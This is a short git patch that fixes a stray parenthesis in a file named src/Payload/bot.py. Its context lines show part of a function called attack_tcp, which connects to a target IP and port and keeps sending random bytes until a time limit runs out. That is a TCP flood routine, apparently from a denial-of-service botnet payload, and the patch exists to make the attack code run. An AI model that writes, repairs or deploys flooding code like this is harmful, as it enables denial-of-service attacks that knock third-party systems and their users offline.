From b2447b41a5f209cbb21fecf8f7d9484af27e1e53 Mon Sep 17 00:00:00 2001 From: Neutron Date: Tue, 20 Aug 2024 01:34:27 +0200 Subject: [PATCH] Update bot.py There was a ) in line 317 that wasn't expected. --- src/Payload/bot.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/Payload/bot.py b/src/Payload/bot.py index 55e42b3..989d4f3 100644 --- a/src/Payload/bot.py +++ b/src/Payload/bot.py @@ -304,7 +304,7 @@ def attack_tcp(ip, port, secs, size): try: s.connect((ip, port)) while time.time() < secs: - s.send(random._urandom(size))) + s.send(random._urandom(size)) except: pass